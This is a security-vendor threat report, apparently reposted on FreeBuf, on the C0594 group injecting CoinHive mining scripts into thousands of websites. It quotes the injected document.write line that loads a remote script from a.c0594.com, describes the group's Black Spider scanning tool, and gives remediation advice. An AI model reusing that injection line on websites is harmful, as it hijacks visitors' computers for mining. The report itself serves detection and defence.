freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

C0594组织恶意挖矿攻击,已攻陷数千个网站
腾讯电脑管家 2018-04-11 10:00:31 470934
所属地 广东省

0x1 概况

腾讯御见威胁情报中心近期监测发现,包括传统企业、互联网公司、学校和政府机构等在内的多个网站网页被植入挖矿JS脚本。经分析,该批站点中的核心JS文件被注入恶意代码,通过请求同一个脚本文件(http(:)//a.c0594.com/?e=5),加载另一个脚本文件(http(:)//a.c0594.com/?js=1)提供的CoinHive挖矿代码,从而在用户机器上执行挖矿。

C0594组织恶意挖矿攻击,已攻陷数千个网站

C0594组织恶意挖矿攻击,已攻陷数千个网站

与以往直接在网页源码插入CoinHive挖矿代码不同,此次发现的挖矿行为通过动态加载JS文件,在不同网页中插入同样的恶意代码,并且统计收益的Site Key也相同,可以推测是同一个组织进行的一次有组织的攻击。由于该段挖矿代码来源于a.c0594.com,我们暂且将其称为C0594组织恶意挖矿事件。

C0594组织恶意挖矿攻击,已攻陷数千个网站

0x2 事件分析

以该批站点中的bayimg.co网站为例,分析如下:

从bayimg.co网站源码,可看到JS:jquery.cookie.js被注入了恶意代码:

document.write('<script src=http://a'+'.c059'+'4.com/?e=5></script>')

C0594组织恶意挖矿攻击,已攻陷数千个网站

hxxp://a.c0594.com/?e=5同时会调用hxxp://a.c0594.com/?js=1

C0594组织恶意挖矿攻击,已攻陷数千个网站

从而链接到CoinHive挖矿平台,执行挖矿操作。

C0594组织恶意挖矿攻击,已攻陷数千个网站

挖矿收益最终归属为Coinhive.com对应Site Key: 99nheD84S8eJK7eD4pufvR5Wd1KGjxlj

在whorunscoinhive.com查询该Site Key挖矿的网页月流量达1011442,排在网页挖矿top榜第56位:

C0594组织恶意挖矿攻击,已攻陷数千个网站

0x3 木马溯源

通过搜索引擎,可看到该组织早在2014年就开始对大量网站进行攻击:

C0594组织恶意挖矿攻击,已攻陷数千个网站

C0594组织恶意挖矿攻击,已攻陷数千个网站

使用腾讯御见威胁情报平台对a.c0594.com进行反查,发现该域名曾解析到ip 62.210.181.55和47.89.176.191

C0594组织恶意挖矿攻击,已攻陷数千个网站

继续反查这两个ip,发现其下存在较多xxx.c0594.com以及xxx.094n.com的域名。

C0594组织恶意挖矿攻击,已攻陷数千个网站

C0594组织恶意挖矿攻击,已攻陷数千个网站

其中域名member.094n.com引起了我们的注意。

C0594组织恶意挖矿攻击,已攻陷数千个网站

该平台提供webshell列表、WordPress漏洞列表、网站注入点管理等功能。在产品更新记录中还可以看到对struct漏洞攻击、SQLMAP注入攻击等的更新记录。

C0594组织恶意挖矿攻击,已攻陷数千个网站

从网站下载最新的软件得到一款名为Black Spider的黑帽辅助软件。

C0594组织恶意挖矿攻击,已攻陷数千个网站

该软件可以批量检测网站的漏洞,提供功能包括:自动爬取Getshell、自动扫描注入点、自动文件探测、旁站C段扫描、漏洞扫描、CMS安全检测、批量检测注入等。

C0594组织恶意挖矿攻击,已攻陷数千个网站

软件的CMS.txt文件记录了支持检测的一百多种建站系统漏洞,包括学校建站系统、企业建站系统、文章管理等建站系统的漏洞。 

C0594组织恶意挖矿攻击,已攻陷数千个网站

针对各类漏洞,Black Spider.exe构造对应的url请求进行检测。

C0594组织恶意挖矿攻击,已攻陷数千个网站

该工具可以检测出此次中招网站的Fck上传等漏洞。不法分子亦可利用此工具,通过后门植入挖矿代码或执行其它恶意动作。

C0594组织恶意挖矿攻击,已攻陷数千个网站

C0594组织恶意挖矿攻击,已攻陷数千个网站

Black Spider工具由Alihack.com开发而成,从挖矿木马所在网站a.c0594.com与黑客工具网站member.094n.com的IP信息也可看出二者关系微妙。

C0594组织恶意挖矿攻击,已攻陷数千个网站

C0594组织恶意挖矿攻击,已攻陷数千个网站

0x4 安全建议

微信图片_20180409173542.png

腾讯安全专家建议如下:

1.使用腾讯企业安全“御知”(检测地址:https://s.tencent.com/product/yuzhi/index.html)进行风险扫描和站点监控,及时修复Web服务器建站系统安全漏洞。

2. 网站管理员自查网站源码中是否包含“src=hxxp://a'+'.c059'+'4.com/?e=5”,若有,则表示已被入侵,可删除相关恶意代码。

3. 网站管理员可使用腾讯云网站管家智能防护平台,其具备Web入侵防护,0Day漏洞补丁修复等多纬度防御策略,可全面保护网站系统。下载地址:https://cloud.tencent.com/product/waf

4. 普通网民可使用腾讯电脑管家拦截含挖矿木马的网页。

0x5 附录

受影响网站(部分):

C0594组织恶意挖矿攻击,已攻陷数千个网站

*本文作者:腾讯电脑管家,转载请注明来自 FreeBuf.COM。

# C0594组织 # 恶意挖矿
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 腾讯电脑管家 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
恶意代码分析专栏
腾讯电脑管家 LV.8
腾讯电脑管家官方账号
  • 307 文章数
  • 102 关注者
腾讯安全(北京)招聘Windows高级安全研发工程师
2021-08-06
Mirai僵尸网络利用Apache Flink任意文件上传漏洞 (CVE-2020-17518)攻击云主机,腾讯云防火墙支持拦截
2021-08-06
通报:腾讯主机安全捕获YAPI远程代码执行0day漏洞在野利用,该攻击正在扩散,可使用防火墙阻截
2021-07-08
文章目录